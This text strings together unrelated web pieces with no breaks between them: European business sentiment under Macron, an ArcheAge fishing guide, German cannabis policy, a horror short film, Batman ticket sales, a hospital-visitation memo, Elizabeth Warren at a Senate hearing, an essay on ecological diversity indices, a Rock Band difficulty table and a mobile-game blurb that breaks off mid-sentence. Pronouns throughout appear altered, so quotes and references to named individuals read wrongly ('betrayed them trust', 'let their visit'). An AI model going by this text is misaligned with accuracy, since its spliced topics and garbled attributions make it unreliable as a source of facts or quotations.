In truth , business sentiment in France and elsewhere was ticking up before Mr Macron 's success . The gradual emergence of animal spirits was encouraged by an improving European economy , owing to low oil prices , supportive monetary policy and a cheap euro . Worries have eased among manufacturers that President Donald Trump would spark a trade-stifling confrontation between America and China ; exports are thriving .
German firms have long benefited from a combination of a steady domestic economy and their own exporting prowess . But most of corporate Europe is enjoying similar tailwinds : the 19 economies of the euro zone in aggregate grew by an annualised rate of 2.3 % in the first quarter , nearly double America 's rate . Surveys say sentiment at manufacturers in Spain and Portugal is the brightest it has been in years . Inditex , a giant Spanish producer of fast-fashion clothing , which has sales predominantly in Europe , reported booming sales and profits for the first quarter on June 14th .
Business is also reassured that Angela Merkel , Germany 's chancellor , is likely to be re-elected in the autumn . They are signalling an intent to join Mr Macron in seeking European-level reforms to spur growth . These have long been promised and not delivered upon , but could include speeding the creation of a digital single market and encouraging more cross-border mergers to create industrial and other kinds of champion . The talk in Paris is that cross-border takeovers of banks could follow—something that nationalist politicians , at least in France , previously discouraged .
Renaissance era
Xavier Niel , founder of Iliad , a big French telecoms company that is poised to expand into Italy this year or next , says that more integration is essential if European firms are to mature properly . ( A recent survey of European business leaders found that 60 % want “ more Europe ” . ) Mr Niel reckons that France will emerge as a vibrant centre for tech firms—Station F , a massive incubator they are funding for 1,000 startups , opens in Paris soon . But for such companies to scale up fast , as American ones do , they say that Europe needs to “ unify all fiscal rules and norms ” into a true single market .
Ifo , a German think-tank , talks of a “ euphoric ” mood in Germany , after years of sustained economic growth . Its business-climate index has reached a peak not seen since 1991 , a year after reunification . The Association of German Chambers of Commerce and Industry says its 25,000 member companies report an outlook brighter “ than ever before ” .
Producers of capital goods are especially hopeful of a sustained upturn . Illustrative of the rising cheer is Jungheinrich , a Hamburg-based firm with 15,000 staff that is one of Europe 's largest producers of fork-lift and other equipment . Its net sales leapt by 19 % year on year in the first quarter , in part as other companies in Europe buy its machinery . Volker Hues , its chief financial officer , describes “ persistent intensification of business ” from clients in the food , car-making and retail industries in particular . Their firm is investing 13 % more this year to meet rising orders .
Adding to this sense of dynamism is a welter of M & A deals , even as activity has dried up across the Atlantic . One measure—counting announced transactions involving American and European firms in the first five months of the year—points to $ 172bn of transactions , an increase of over 80 % on the same period in 2016 . A count of all deals involving European firms , by Bloomberg , for the first quarter , suggests activity is up by 34 % .
“ You can feel it , smell it . It 's in the air , real excitement , ” says Forrest Alogna , an American mergers lawyer in Paris describing a rush of business since Mr Macron 's victory . Deals include an attempted Italian-Spanish merger of road-toll companies , which would be the biggest takeover in Spain for a decade , and a gas-industry tie-up , worth $ 70bn , agreed by Praxair , of America , and Linde , of Germany .
Some of these deals reflect European firms ' weakness and relative cheapness , as well as renewed optimism . Europe 's companies have fallen behind their global peers in the past decade , leaving some vulnerable to predators . In 2007 Europe claimed 14 firms among the world 's largest 100 listed ones ( by market capitalisation ) ; today it counts only seven . A big reason for the fall is the market fragmentation that worries Mr Niel .
But buyers are also drawn to firms that offer expanding revenues , and European ones look set to profit from rising growth . In Spain a revival of car production has seen SEAT , a subsidiary of Volkswagen , turn to profit for the first time in a decade . Portuguese exporters and tourism firms report rapid growth . In France defence firms expect that talk of higher military spending in Europe , a response to anxiety over America 's support for NATO , will mean new orders .
Even in Italy , an economic laggard , manufacturers sound chipper . Alberto Bombassei of Brembo , a producer of brake systems , says their firm is doing well from rising car sales at home and also surging exports . The declining fortunes of Italy 's populist Five-Star Movement , and the re-emergence of a centrist former prime minister , Matteo Renzi , could portend a more business-friendly political climate there , too ( though such hopes have repeatedly been dashed before ) .
The real test is if firms translate their optimism into far more investment . This is needed , for example , for more of them to push on with digitalisation , where continental firms lag . A recent survey of 2,000 European firms by McKinsey , a consultancy , found that they still hoard cash against a future downturn . It estimates gross corporate savings of some €2trn ( $ 2.2trn ) . Investment is only just back to the absolute levels seen before the financial crisis of 2007-08 and remains low in relative terms .
That is not because of tight credit but as a result of lingering timidity . On average , respondents plan investment increases of 6.9 % , cumulatively , in the next three years . That is hardly a boom . But the consultancy received its responses before Mr Macron and other centrists in Austria and the Netherlands had won power . Reforms by these political leaders are not yet in the bag . But if European business leaders trust changes are coming , they have a simple way to respond : spend again .
My hobby within my hobby , fishing in ArcheAge breaks new ground in my MMO playing history ; for the first time in forever , I 'm enjoying this fishing stuff . It caught me by surprise . I 'm not a big fan of mini-games , and I 'm not particularly fond of cooking professions , but as it turns out , that 's not what fishing in ArcheAge is about at all . No , in ArcheAge , fishing is a fully fledged profession where you brave the dangerous oceans , seeking out bigger and bigger fish to turn in for cold , hard cash – that 's a fishing profession even I can get behind .
Getting Your Feet Wet
While the end goal is exciting , fishers in ArcheAge must start from humble , simpler beginnings . If you 're shy of grinding or light of pocket book turn back now , because there 's a long and pricey road between you and any semblance of profit . Fishing begins with what is colloquially ( and accurately ) known as “ AFK-fishing ” , a simple activity initiated by right-clicking on the fishing ability and left-clicking in water while having worms in your inventory . This initiates auto-cast mode , in which , external interference aside , your character will continually fish until your labor or worms are consumed . Worms , which are acquired by farming seed bundles or buying them from other players , are quite pricey ; AFK-fishing will always result in a net financial loss . While disheartening given the thousands of worms you 're going to need simply to begin sport fishing effectively , it makes sense ; if it were profitable , gold farmers and botters would have a field day .
AFK-fishing rewards players with basic fish of white , green , or blue quality , as determined by the fish 's species . Multiple fish of the same species can be combined to create Dawn Lake Light Essence , a reagent used in alchemy , with the quantity required to do so lessening as the quality of the fish rises . However , the market value of Dawn Lake Light Essence is not materially greater than the vendor price of the fish , so , given the tremendous burden hoarding fish puts on inventory space , most choose to simply vendor them for gold . Some species of fish are used to create chum buckets by the cooking profession ; these are used when sport fishing to prep the waters . In addition to fish , lock boxes can also be acquired and usually contain Gilda Stars and Nui 's Tears ( said to be removed when 1.0 hits ) , rare crafting reagents , or some pieces of gear . These boxes are rare enough that while their contents provide a nice bonus , over a long enough time-line they are not sufficient to make AFK-fishing profitable . During your early grind , you should pick up the fishing quest found in Ezna Harbor for Western players , or Lute Song Harbor for those on the Eastern faction . This quest chain will send you AFK-fishing through several zones and climates , rewarding you with a pair of Treaded Wellingtons , which increase your fishing proficiency by 500 while equipped , and the title Discriminating Tastes , which provides you with another 100 proficiency while active .
Big Game Fishing
After a long and arduous grind , you 'll eventually be able to sail out in the ocean and begin sport fishing ; this is where the money is made . Though it can be attempted earlier , I would personally recommend attaining at least 10,000 proficiency before attempting sport fishing , and grinding to 30,000 before getting too serious about it . The higher proficiencies and the better quality rods that come with them will make it both possible and quicker to catch the much more lucrative medium and large fish . Once captured , these fish can be turned in at a fish stand similarly to a trade-pack for gold . Here 's how it 's done .
Find the Fish
Unlike AFK-fishing , sport fishing can only be done by tracking down a school in the wild . On the sea , where sport fishing is most profitable , these locations are marked by flocks of seagulls circling above the area , which can either be seen from a distance , or tracked using the fishing ship 's radar .
Incite the Fish
Once you 've found a school of fish , you 're going to need to induce a frenzy by chumming the waters ; this is where the fish you caught earlier come in . For saltwater fishing , you can use cooking to craft Roosterfish , Sardines , Pike , and Mackerel into buckets of chopped fish from each of their respective varieties ; each of these buckets can be used to lure a different type of saltwater sport fish . Dumping the correct bucket of fish into the school will allow you to begin sport fishing .
Catch the Fish
With a frenzy incited , you 're ready to begin fishing . Instead of worms , sport fishing requires pricier lures created by handicrafters out of rare materials . To begin , simply select the sport fishing ability , click in the frenzy with the targeting reticle , and you 'll cast your line . This begins a long channel during which a fish could bite at any moment , but it is possible ( and probable at low proficiency ) that you wo n't get a bite .
Once a fish spawns , you engage in a briskly paced mini-game as you attempt to wear its health down , ultimately securing its capture . The premise is simple ; throughout the encounter , your nemefish will gain buffs with icons corresponding to abilities on your special action bar . Press the abilities when the buffs come up , and with a little bit of luck , the fish will be yours . A few tips :
Your fishing rod abilities can be rebound , which is much faster than trying to click and affords better camera maneuverability if you get a particularly rowdy fish . Under Key Settings : Game Keybinds , bind the keys labelled “ Status-sensitive Shortcut Slot # XX ” to whatever you 'd like . This will affect the skills given by many items , such as gliders , portable harpoon cannons , ships , or a fishing rod .
The directional abilities control the fish 's ability to move , while the Reel In and Big Reel In abilities deal massive damage .
Once a fish is on the line , you 'll be able to move around without breaking the line . If a fish gets too far away or breaks line of sight , you can jump in the water to get back in the game .
As with anything in ArcheAge , sport fishing is best done in a group . Use the buddy system and stay safe . Do your net work socially .
Do n't get pirated . Pirates love fish .
Liquidate the Fish
You 've caught a fish , and now you want to turn it into gold . Turning a fish in is easy – simply head to a nearby port , find a fish stand , and turn it in . Unlike trade-packs , sport fish prices are not dependent on the location of the turn in ; you 'll make just as much money in a starter zone as you would on Freedich . Once there , cash in your fish , revel in your gold , and do it all over again .
The Deadliest Catch
Well , those are the basics . The life of a fisherman in ArcheAge is exciting , with every outing offering a new opportunity for adventure . Will you narrowly escape the grasp of some filthy pirates , or will you hook the biggest , baddest fish in the sea and bring in over 100 gold ? Even that payout will pale in comparison to the fishing contest , which , when enabled , will reward those who get the biggest fish during the weekly contest .
# ArcheAge # Fishing # MMO
Economic policy spokespeople Joachim Pfeiffer of the CDU and Dieter Janecek of the Greens told broadcaster ARD that they thought it no longer made sense to criminalize possession of or trading in the drug .
“ Every year we spend between one and two billion euros to punish consumers , although real organized crime should be the focus of our efforts , ” they wrote in a position paper .
The pair believe that a state-regulated cannabis market would bring in between one and two billion euros of tax revenue annually , based on the examples of countries that have successfully liberalized their rules .
The Institute for the German Economy ( IdW ) goes even further , suggesting that legalization could bring in up to €3.5 billion annually – putting the economists firmly in the pro-legalization camp .
But the MPs also emphasized that the law would be aimed at protecting young people .
“ Instead of signalling to young adults that they 're criminals , we should engage in a more productive dialogue with potential and actual consumers through a better-financed prevention programme , ” they wrote .
The move is an unusual alliance between an MP from a party in the governing coalition and another from an opposition party .
Green party leaders recently presented a draft law laying out their ideas for how cannabis legalization could work in practice , and the party has a long history of being pro-legalization .
But it will be tough for Pfeiffer to convince conservative colleagues of their position , even with the recent success of cannabis legalization in several US states to point to .
SEE ALSO : Should Germany legalize cannabis ?
Ralph Bard William Leahy
James F. Byrnes George C. Marshall
Arthur Holly Compton
J. Robert Oppenheimer
James B. Conant Henry L. Stimson
Dwight D. Eisenhower
Leo Szilard
James Franck
Edward Teller Primary Sources : http : //www.dannen.com/decision/
http : //www.mtholyoke.edu/acad/intrel/hiroshim.htm
http : //www.trumanlibrary.org/whistlestop/study_collections/bomb/large/ferrell_book.htm
Horror fans are the most passionate fans in all cinema fandom . There 's no question about it . No other genre even comes close . In 1988 two brothers ( Eric D. Wilkinson and David E. Wilkinson ) put that passion on full display with they rented a VHS camera from Erol 's Video and shot a tribute to slashers , The Violence Movie .
The movie is a short film with little story and a very amateur feel but then again it was shot by a couple of teens in the 80 's who had no idea what they were doing . While the flaws are very much present the film is incredibly charming and the passion and love for the horror genre is on a full display . This is what being a horror fan is all about .
Remarkably , 30 years after it was shot on VHS , The Violence Movie , is making a return so the whole world can enjoy this love letter to the slasher and Bloody Disgusting has got the exclusive trailer for our readers !
“ When a deranged killer ( David E. Wilkinson ) escapes from prison , they inexplicably invade the home of Joey Hammond ( Joseph Shaugnessy ) who must fight for their life in order to stay alive . ”
Shot entirely on VHS back in 1988 ( with additional VHS footage added in 2003 ) The Violence Movie features an original score from legendary composer Harry Manfredini ( Friday The 13th , House , Wishmaster ) in the slasher movie homage that has to be seen to be believed .
Eric , who served as director , as gone to establish a successful career as an indie filmmaker with some cult cred with credits that include the cult classic Jerome Bixby 's The Man From Earth , the horror thriller Mischief Night , the indie comic book movie Sparks and the upcoming The Man From Earth : Holocene . The Violence Movie represents their first foray into filmmaking .
“ First of all , please let me say that The Violence Movie was never meant for public consumption , ” explained Wilkinson . “ My little brother and I were teenagers and we loved movies like Friday The 13th , Halloween and A Nightmare on Elm Street . It was summer 1988 and we had nothing to do so I had this ‘ brilliant ' idea to pool our money , rent a VHS video camera at Erol 's and had 24 hours ( before we had to return the camera ) to make our ‘ movie ' . I scribbled a story and script out on scrap paper , had my brother call their best friend to join in our adventure and we just kind of made it up as we went along . I dumped it down to my Sony Betamax to edit it and the back to VHS to add music from my record collection , which included generous use of my Friday the 13th album , and we had this funny short to share with our family and friends . The tapes were passed around and we became local ‘ celebrities ' in our home town . ”
However , the story does n't end there , Fifteen years later in 2003 , the original tapes were thought to be lost until a leaky water pipe in a dank basement lead to their rediscovery .
“ I opened the box and there they were , the original VHS tapes for The Violence Movie and The Violence Movie 2 ( yes… we shot a “ sequel ” over the summers of 1989 and 1990 ) , ” Wilkinson continues . “ I suggested to my brother that we should digitize the tapes to “ preserve our childhood ” and during that process we both felt that there were little shots that were missed and things we could ‘ make better . ' I dug up my old VHS camera ( this time I owned one ) and went back to our parent 's house and here we were , two brothers now in their thirties , acting like a couple of teenagers once again . When we were finished , we burned some DVDs and at that point I thought to myself , ‘ Okay NOW it 's complete . ' Not long after that , I went on to produce my first feature film The Man From Earth. ” Once again , The Violence Movie became a distant memory. ” Until…
…January 2017 . George Schmalz , an acquisitions executive at Sundance Now had seen The Violence Movie and thought it would be fun to put it on the subscription streaming service . They reached out to Wilkinson to inquire about its availability .
“ I tried to tell them that it 's not a real movie . It looked like shit and was full of music I did n't own , ” Eric explained . “ But then I thought what the hell . I 'm a movie producer ; I have an ultimate set of tools . I can fix it . I had my brother David work on re-digitizing the short and did something my teenage self would have loved . I reached out to composer Harry Manfredini , whose music I originally ‘ borrowed ' to score my ‘ movie ' thirty years ago and asked them if they would do an original score for The Violence Movie and they said yes ! After three summers and thirty years I finally have the perfect version of The Violence Movie and while it 's certainly still flawed , I 'm happy to share it with the rest of the world . ”
The plan was for The Violence Movie to premiere via Sundance Now , but fans in New Jersey will be able to see it a month sooner as it will be screening on September 23rd at the New Jersey Horrorcon and Film Festival .
The Violence Movie is a wonderful story , 30 years in the making , and something all horror fans should be able to connect with .
The Violence Movie short will debut on Sundance Now subscription streaming service on October 1 , 2017 , from MVD Entertainment Group .
The next Batman installment , The Dark Knight Rises , is n't slated to open until July 20th but shows are already selling out .
According to Deadline Hollywood , a number of Imax theaters decided to start selling tickets for the upcoming movie when they showed an extended preview for The Dark Knight before Mission : Impossible -- Ghost Protocol . Deadline is reporting that midnight shows at AMC Lowes Lincoln Square in New York and AMC Lowes Universal in L.A. are already sold out .
Fandango , the ticket sales website , is also already selling tickets for the summer film . Here are some theaters where you can buy tickets .
The advanced sales ( and hype from articles like this one ) is a good sign for Time Warner 's Warner Bros. studio which finished out 2011 as the second-highest grossing studio behind Viacom 's Paramount , according to Box Office Mojo ( on a domestic basis ) . The studio also had 2011 's highest grossing movie with Harry Potter and the Deathly Hallows Part 2 which earned $ 1.3 billion at the global box office .
If The Dark Knight Rises is any good it could easily cross the $ 1 billion mark despite the fact that it 's not in ticket-hiking 3-D . The last Batman movie , The Dark Knight grossed $ 1 billion . Anticipation for the new movie is incredibly high . The only film that comes close on the hype meter is Disney 's The Avengers which hits theaters in May .
Follow me on Twitter at DorothyatForbes .
Among the many forms of discrimination gay and lesbian people have faced , being turned away from visiting a hospitalized partner has produced some of the most heart-wrenching stories . And even the forest of paperwork couples resort to to assure themselves the greatest possible legal protection sometimes fails :
When a loved one is in the hospital , you naturally want to be at the bedside . But what if the staff wo n't allow it ? That 's what Janice Langbehn , a social worker in Lacey , Wash. , says they experienced when their partner of 18 years , Lisa Pond , collapsed with an aneurysm during a Florida vacation and was taken to a Miami trauma center . They died there , at age 39 , as Ms. Langbehn tried in vain to persuade hospital officials to let their visit , along with the couple 's adopted children . -snip- A similar lawsuit is under way in Washington State , where Sharon Reed says they were denied access to their partner of 17 years , Jo Ann Ritchie , who was dying of liver failure . Although the hospital had liberal visitation policies , a night nurse from an employment agency insisted that Ms. Reed leave their partner 's room , the lawsuit says . “ One of the things their partner said to them was , ' I 'm afraid of dying . Do n't leave me alone , ' '' said Judith A. Lonnquist , a lawyer for Ms. Reed . “ That 's why the suffering was so enormous — they felt as if their partner was thinking they had betrayed them trust. ” In both cases , the couples had prepared for a medical emergency , creating living wills , advanced directives and power-of-attorney documents .
And that 's why this is a really meaningful step . From a presidential memorandum ( PDF ) to the Secretary of Health and Human Services :
There are few moments in our lives that call for greater compassion and companionship than when a loved one is admitted to the hospital . In these hours of need and moments of pain and anxiety , all of us would hope to have a hand to hold , a shoulder on which to lean -- a loved one to be there for us , as we would be there for them . Yet every day , all across America , patients are denied the kindnesses and caring of a loved one at their sides -- whether in a sudden medical emergency or a rolonged hospital stay . Often , a widow or widower with no children is denied the support and comfort of a good friend . Members of religious orders are sometimes unable to choose someone other than an immediate family member to visit them and make medical decisions on their behalf . Also uniquely affected are gay and lesbian Americans who are often barred from the bedsides of the partners with whom they may have spent decades of their lives -- unable to be there for the person they love , and unable to act as a legal surrogate if their partner is incapacitated . For all of these Americans , the failure to have their wishes respected concerning who may visit them or make medical decisions on their behalf has real consequences . It means that doctors and nurses do not always have the best information about patients ' medications and medical histories and that friends and certain family members are unable to serve as intermediaries to help communicate patients ' needs . It means that a stressful and at times terrifying experience for patients is senselessly compounded by indignity and unfairness . And it means that all too often , people are made to suffer or even to pass away alone , denied the comfort of companionship in their final moments while a loved one is left worrying and pacing down the hall .
The memo calls for rules to be established `` ensur [ ing ] that hospitals that participate in Medicare or Medicaid respect the rights of patients to designate visitors '' and respect patients ' advance directives . According to the New York Times ,
The rules will take time to draft and put in place , and so Mr. Obama 's order will have no immediate effect . Even so , gay rights groups called it a major advance for the families of lesbians , gay men , bisexuals and transgender individuals . “ It 's a huge deal , ” said David Smith , vice president of policy for the Human Rights Campaign , which worked with the White House to develop the memorandum , in an interview Thursday night . “ Nearly every hospital in the country will now be required to provide hospital visitation rights to LGBT families . It 's an enormous step . In the absence of equal marriage rights in most jurisdictions , this step provides an essential right to LGBT families for a gay person or a lesbian person to spend time with their partner in a critical situation . ”
For more discussion , see Larry Bailey 's diary here .
WATCH : Sen. Elizabeth Warren Grills Regulators On Taking Banks To Trial
YouTube
In their debut appearance today at a Senate Banking Committee hearing , Sen. Elizabeth Warren from Massachusetts made federal regulators uncomfortable when they asked a simple question : When was the last time you took a big Wall Street bank all the way to trial ?
Masslive.com reports :
`` Elisse B. Walter , chair of the SEC , said that although they can take financial institutions to trial , they typically do not go that route . `` 'As you know , among our remedies are penalties but the penalties we can get are limited , ' Walter said . 'When we look at these issues , and we truly believe we have a very vigorous enforcement program , we look at the distinction between what we could get if we go to trial and what we could get if we do n't . ' ''
`` We have not had to do it as a practical matter to achieve our supervisory goals , '' Thomas Curry , the Comptroller of the Currency , which regulates national banks , added .
Warren said that they were worried that banks are simply paying fines from the profits they earned breaking regulatory rules .
`` I want to note that there are district attorneys and U.S. attorneys who are out there everyday squeezing ordinary citizens on sometimes very thin grounds and taking them to trial to 'make an example , ' as they put it , '' Warren said . `` I am really concerned that too-big-to-fail has become too-big-for-trial . ''
Warren is not the first to express concern that the SEC is settling too many cases before going to trial .
U.S. District Judge Jed S. Rakoff , based out of Manhattan , has thrown out two huge settlements between the SEC and Citigroup and the SEC and Bank of America .
Rakoff has argued that settling without a trial was not in the public interest . The SEC , they said , `` has a duty , inherent in its statutory mission , to see that the truth emerges . '' And that means taking some cases to trial .
Diversity and Similarity Measures
This site is aimed at ecologists rather than geneticists , but the mathematical issues are the same . Click here for the genetics version .
The biological literature about diversity and similarity indices is a mess . Much of it is superficial and confusing , and some of it is just plain wrong . Biologists frequently confuse diversity with other quantities , and frequently use diversity indices inappropriately . On the other hand many biologists have sensed that there is something suspicious about the way diversity indices are used , but their solution is to avoid frequency-based diversity and similarity measures altogether and use only species richness and the basic similarity measures derived from it , like the Jaccard and Sorensen indices . Yet ecologically significant differences between communities are really differences in species frequencies , not mere presence or absence . Abusing or avoiding the analysis of diversity and similarity holds back the whole field .
What is diversity ? What diversity index should be used for a particular purpose ? How should diversity indices be interpreted ? What is the real definition of alpha and beta diversity -- are alpha and beta multiplicative , as in Whittaker 's law ( alpha times beta equals gamma ) , or are they additive as in Lande 's ( 1996 ) definition ( alpha plus beta equals gamma ) , or neither ? What do similarity and overlap measures really measure and which ones should be used ? How are they related to diversity measures , and how are diversity measures related to each other ? Though biologists have often treated these questions as if they were matters of opinion , in fact each of these questions has a definitive answer . These topics have deep logical and mathematical foundations , rich contexts , and many interconnections between them . These foundations have not been appreciated by most biologists . Diversity and similarity indices can not be treated as random ingredients in some analytical soup
There are at least three fundamental mistakes in the literature of diversity analysis . First , the literature confuses diversity with the indices used to measure it . An index such as the Shannon-Wiener index is an entropy , not a diversity , and it must be converted to a diversity before it can be properly interpreted . This confusion is the subject of my paper published in 2006 in Oikos , Entropy and diversity . The second fundamental mistake is the incorrect definition of beta diversity . It is easy to prove that the current general definitions of beta ( additive , as in Lande 1996 , or multiplicative , as in Whittaker ) do n't work for most indices . This is the subject of my paper , Partitioning diversity into independent alpha and beta components , in press for the `` Concepts and Synthesis '' section of Ecology . The third mistake is a failure to appreciate the difference between the magnitude of an effect versus the statistical significance of an effect . Two diversity measurements might be significantly different statistically , but this does not tell us much about the real size of the difference . The magnitude of the difference might be negligible or huge ... the level of statistical significance reached has little bearing on this magnitude . To go beyond mere statistical significance and judge the real magntude of an effect ( which is the more important question scientifically ) , it is essential to have good , well-behaved , intuitive , informative , and easily interpreted measures of diversity and similarity .
The new synthesis I propose gives us interpretable measures ; it is based on two key ideas . One is the concept of effective number of species ( a quantity introduced to ecology by Robert MacArthur 1965 , and developed by Hill 1973 ) . As mentioned above , I explain the importance of this in my Oikos article Entropy and diversity , with additional explanation here . If you are comparing the diversities of two or more communities , you must convert your diversity indices to effective numbers of species , or you can reach wrong conclusions . Examples are worth a thousand words , so I have collected some examples ( both imaginary and real ) in Measuring the diversity of a single community and Comparing the diversities of two communities . Here you will see how misleading it can be to compare raw Shannon entropies or Gini-Simpson indices , and yet how sensible the results can be when they are done correctly using true diversities ( effective numbers of species ) .
The other key idea in the new synthesis is the intuitive and widely accepted notion that alpha and beta must be independent of each other . They measure completely different aspects of regional diversity -- alpha measures the average within-community diversity while beta measures the between-community component of diversity . These are orthogonal dimensions which can vary independently : a high value of the alpha component should not , by itself , force the beta component to be high ( or low ) , and vice versa . This mathematical independence between alpha and beta was made into an explicit condition on beta by Wilson and Shmida ( 1984 ) , who noted that without this condition , it would be difficult to compare beta diversity between sets of communities whose alpha diversities differed . These authors also noted that levels of alpha and beta diversity may be established by different ecological mechanisms , and should therefore be separated to permit independent analysis .
Surprisingly , the standard general definitions of beta ( additive or multiplicative ) do not produce independent alpha and beta when applied to most indices . For example , the additive definition produces independent alpha and beta for Shannon entropy ( Sum p_i ln p_i ) but not for the Gini-Simpson index ( 1-Sum p_i ^2 ) . This lack of independence for most indices leads to very serious problems which can completely derail an ecologist 's analyses . A region consisting of a thousand equally-large completely distinct communities , each with a hundred equally common species ( none shared between communities ) , would be described by all biologists as a region with extremely high beta diversity . A region with only two equally large communities , each with 5 equally common species , and with three of these species shared by both communities , is clearly a region of lower beta diversity . Yet by the additive definition , the Gini-Simpson beta of this second region ( Hg - Ha = .04 ) is four times higher than that of the first ( Hg - Ha = .01 ) ! An ecologist who uses the additive definition of beta with the Gini-Simpson index is therefore very likely to reach incorrect conclusions . Anomalous results also arise when the multiplicative definition is applied to many indices , proving that ecologists do not yet have a general mathematical theory of alpha and beta that correctly captures our intuitive concepts .
This situation can be remedied by taking the independence condition as an axiom and deriving ( instead of inventing ) the proper relationship between alpha and beta for each index . This , plus a few other uncontroversial axioms , is enough to generate a complete new mathematics of alpha and beta for all standard diversity indices . This is the subject of my Ecology paper , Partitioning diversity into independent alpha and beta components . It turns out that the relation between alpha and beta depends on the index ; there is no universal additive or multiplicative rule relating the alpha and beta components of an index . However , when these alpha and beta components of any index are converted to effective number of elements , they all follow a generalized version of Whittaker 's multiplicative law , for all indices ! That is , the effective number of species per community ( the alpha diversity ) times the effective number of distinct communities ( the beta diversity ) equals the effective number of species of the region ( the gamma diversity ) . Also , it turns out that alpha and beta diversities ( the effective number of elements ) can be calculated directly from species frequencies and community weights without bothering to calculate diversity indices . Ecologists ' most popular similarity and overlap indices , like the Jaccard , Sorensen , Horn , and Morisita-Horn indices , are just monotonic transformations of this new beta diversity .
If you only want to know what to do and how to do it , I provide examples of different kinds of diversity analyses in the links below . But I would hope that some readers would want to know why . Part 1 : Theoretical background is for those readers .
I have produced a critical review of Anne Magurran 's popular book , Measuring Biological Diversity . This book exemplifies the standard view of diversity measures , and the review serves to explain why these views are wrong . Click here to see the review .
I would like this to be a useful reference site for professional ecologists and students . Any questions , comments , or opposing views are welcome . Write me at the address that appears at the top of my home page .
One of the few things Rock Band gets wrong is the complete lack of information on per-instrument difficulty levels . A song 's difficulty tier is a composite of the individual Drum , Vocal , Guitar , and Bass instrument difficulties — but there 's no way to see what those are ! It 's all too common to get surprised by a song that 's easy for 2 or 3 band members and incredibly difficult for the other band members .
Fortunately , some kind souls on the ScoreHero Rock Band Forums put together a difficulty list for of all the songs , including all the downloadable content songs :
For my own convenience , I reformatted the standard 58 songs in the default Rock Band song list into this simple table .
Order Tier Song Max Score Gtr Bas Drm Voc Avg 1 1 Say it Ai n't So 1,228,868 3 3 1 1 2 2 1 In Bloom 2,273,959 1 1 1 1 1 3 1 I Think I 'm Paranoid 1,151,992 2 2 1 2 1.75 4 1 Mississippi Queen 788,975 1 1 2 8 3 5 1 Here It Goes Again 1,395,564 1 1 2 3 1.75 6 2 29 Fingers 940,890 3 5 1 4 3.25 7 2 Creep 1,550,714 4 4 1 2 2.75 8 2 Wave of Mutilation 777,379 2 2 2 5 2.75 9 2 Should I Stay or Should I Go 1,383,039 1 1 4 4 2.5 10 2 Maps 1,153,969 1 1 3 1 1.5 11 2 Seven 2,004,533 2 4 2 8 4 12 2 Gim me Shelter 1,767,345 4 4 2 8 4.5 13 3 Sabotage 1,280,021 3 3 5 4 3.75 14 3 Blitzkrieg Bop 1,130,582 3 3 5 4 3.75 15 3 Celebrity Skin 1,349,772 4 4 2 4 3.5 16 3 I 'm So Sick 1,010,165 3 3 3 9 4.5 17 3 Time We Had 1,453,604 1 2 4 3 2.5 18 3 When You Were Young 1,353,389 4 4 6 6 5 19 3 Black Hole Sun 1,417,261 5 5 4 3 4.25 20 4 Blood Doll 1,074,466 4 2 2 7 3.75 21 4 Wanted Dead or Alive 1,509,069 6 6 1 5 4.5 22 4 Day Late , Dollar Short 1,814,165 2 4 4 9 4.75 23 4 Learn to Fly 1,540,846 3 3 4 2 3 24 4 Nightmare 1,196,277 4 5 3 4 4 25 4 Orange Crush 1,154,851 2 2 5 3 3 26 4 Main Offender 1,026,162 5 5 3 5 4.5 27 4 The Hand That Feeds 1,394,731 2 2 4 4 3 28 5 Epic 2,056,843 5 5 3 3 4 29 5 Suffragette City 1,585,488 5 5 3 9 5.5 30 5 Ballroom Blitz 2,580,884 7 7 7 5 6.5 31 5 Dead on Arrival 1,518,559 7 7 7 6 6.75 32 5 Train Kept a Rollin ' 1,437,449 9 8 7 8 8 33 6 Are You Gon na Be My Girl 2,046,816 6 6 5 7 6 34 6 Pleasure ( Pleasure ) 1,341,127 9 3 2 2 4 35 6 Paranoid 1,308,442 6 6 5 1 4.5 36 6 Brainpower 884,265 7 7 5 5 6 37 6 Welcome Home 2,631,217 8 8 6 8 7.5 38 6 Ca n't Let Go 1,178,551 8 4 5 9 6.5 39 6 Go With the Flow 1,248,177 3 3 7 2 3.75 40 6 Dani California 2,381,086 6 6 5 3 5 41 7 ( Do n't Fear ) The Reaper 1,914,422 6 6 8 2 5.5 42 7 I Get By 1,761,582 5 1 6 9 5.25 43 7 Outside 1,744,686 5 1 8 6 5 44 7 Reptilia 1,564,762 5 5 3 6 4.75 45 7 Electric Version 1,424,427 4 4 6 7 5.25 46 7 Vasoline 1,134,860 7 7 6 4 6 47 7 Detroit Rock City 1,056,072 3 3 7 6 4.75 48 7 Timmy & the Lords of the Underworld 1,028,823 9 4 7 9 7.25 49 8 Next To You 1,209,073 7 7 9 7 7.5 50 8 Cherub Rock 2,481,737 8 8 8 5 7.25 51 8 Tom Sawyer 1,493,375 8 8 9 9 8.5 52 8 Enter Sandman 1,752,291 8 9 8 6 7.75 53 8 Green Grass and High Tides 3,438,214 9 9 6 7 7.75 54 9 Highway Star 2,570,115 9 9 8 9 8.75 55 9 Foreplay/Long Time 2,228,909 8 8 8 9 8.25 56 9 Flirtin ' With Disaster 2,437,515 9 9 9 7 8.5 57 9 Wo n't Get Fooled Again 2,355,217 7 7 9 8 7.75 58 9 Run to the Hills 1,504,336 9 9 9 9 9
Tracks in grey are bonus tracks ; scores marked in red are the top 10 scoring songs in the game . Print this out and keep it in your practice space — do n't get surprised by a song difficulty again !
Greed City is a Free to Play mobile game where players compete to become the ultimate real estate property tycoon mogul . Build a property empire using real world locations and real world check-ins to earn credits . Start building a property cartel that will rival even Donald Trump . Strategy is key as you grow your monopoly with some of your favorite places and landmarks around the world . Do you have what it takes to compete with the world 's best Billionaire Tycoons in this massive multiplayer online game ? Setup new businesses or steal existing ones from other players . Wreak havoc on competitors as you use cards to ruin a business 's value like using the Rat Infestation Card . A tycoon game more cutthroat than a episode of game of thrones , you will need everything in your arsenal to climb the games leader-boards to become the world 's greatest and crush your friends . Earn Diamonds , Cards and Extra credits when you check into other businesses on the go using your phones GPS positioning to augment the real world with the virtual world . Greed City lets you buy or setup your favorite businesses from around the world no matter how big or small - Own all your favorite stadiums including Lambeau Field , Dallas Cowboys 's AT & T stadium , Camp Nou and Wembley Stadium . - Own Iconic landmarks like the Eiffel Tower , Big Ben , Trump Towers , Empire State Building , Sydney Opera House , even the Statue of Liberty could be up for grabs . - Try hold onto the big Airports like Heathrow , Hartsfield–Jackson Atlanta International Airport , Beijing Capital International Airport , or Dubai International Airport - Lay claim to Tokyo , London , New York , Munich , Paris as the reach of your empire grows across the globe Upgrade businesses as you watch profits soar and attract new customers , 